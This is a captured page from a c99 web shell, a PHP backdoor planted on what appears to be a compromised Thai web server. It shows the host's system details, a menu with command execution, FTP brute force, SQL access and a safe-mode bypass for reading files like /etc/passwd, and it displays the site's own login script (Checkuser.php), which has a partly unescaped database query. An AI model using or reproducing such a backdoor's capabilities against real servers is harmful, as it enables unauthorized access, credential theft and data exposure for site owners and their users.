!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/   drwxr-xr-x
Free 51.23 GB of 127.8 GB (40.09%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     Checkuser.php (2.61 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
    
    session_start
();

    
/**  Set flag that this is a parent file  */
    
if ( !defined'_VALID_ACCESS' ) ) define'_VALID_ACCESS');
    
    
/**  Configuration */
    
require_once( "./configuration.php" );
    require_once( 
$_Config_absolute_path "/includes/framework.php" );

    
/**  Create Database Object */
    
$dbObj = new DBConn;
    
    
/**  ตรวจสอบการป้อนข้อมูลใน Login FORM  */
    //if( isset($_POST['Username']) && isset($_POST['Password']) ) {
    
if( isset($_POST['Login']) ) {
        
        
$Username $_POST["Username"];
        
$Password $_POST["Password"];

        
$query " SELECT *  FROM user_tb  WHERE ( BINARY Username = '".mysql_real_escape_string($Username)."'  AND  Password = MD5('".mysql_real_escape_string($Password)."') )  AND  Flag IN ('0','1') ";
        
$result $dbObj->execQuery($query);
        
$numrows $dbObj->_numrows;
        
        
/**  ตรวจสอบว่าพบ User หรือไม่  */
        
if( $numrows != ) {
            echo 
"<script>alert('ชื่อเข้าใช้งาน หรือ รหัสผ่าน ไม่ถูกต้อง  กรุณากรอกข้อมูลอีกครั้ง');</script>";
            echo 
"<meta http-equiv='refresh' content='0; URL=login.php'>";
            exit();
        }
        else {
            
$rs $dbObj->fetchObject($result);
            
            
/**  กำหนดค่าตัวแปร  */
            
$valid_user $rs->Username;
            
$Priority $rs->Priority

            
$query2 " SELECT * FROM permission_tb  WHERE permission='$Priority' ";
            
$result2 $dbObj->execQuery($query2);
            
$rs2 $dbObj->fetchObject($result2);
            
$redirect_url $rs2->url;
            
            
/**  สร้าง SESSION  */
            
if( !session_is_registered("valid_user") ) session_register("valid_user");
            if( !
session_is_registered("Priority") ) session_register("Priority");
            if( !
session_is_registered("redirectURL") ) session_register("redirectURL");
            
            
$_SESSION["redirectURL"] = $redirect_url;
            
            
    
            
/**  Redirect  */
            
echo "<p style=padding-top:115px><p align=center><br /><span style=\"color:#009900; font-size:14px\"><strong>การล็อกอินเข้าสู่ระบบสมบูรณ์</strong></span><br /><br /><span style=\"font-size:12px\">กรุณารอส้กครู่ กำลังเปลี่ยนหน้าอัตโนมัติ</span><br />";
            echo 
"</p></p>";
            echo 
"<meta http-equiv='refresh' content='1; URL=./$redirect_url'>";
            exit();
        }
        
    } 
# if
    
else {
        echo 
"<script>alert('กรุณาป้อนข้อมูลการเข้าใช้งาน');</script>";
        echo 
"<meta http-equiv='refresh' content='0; URL=login.php'>";
        exit();
    }
    
    
    
/**================================================================*/
    /**  Free Resource  */
    
$dbObj->freeresult($result2);
    
$dbObj->freeresult($result);
    
    
/**  Disconnect DB  */
    
$dbObj->disconn();
    
    
/**  Unset ตัวแปร  */
    
unset($dbObj);

?>
<!-- <meta http-equiv="Content-Type" content="text/html; charset=windows-874" /> -->

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0172 ]--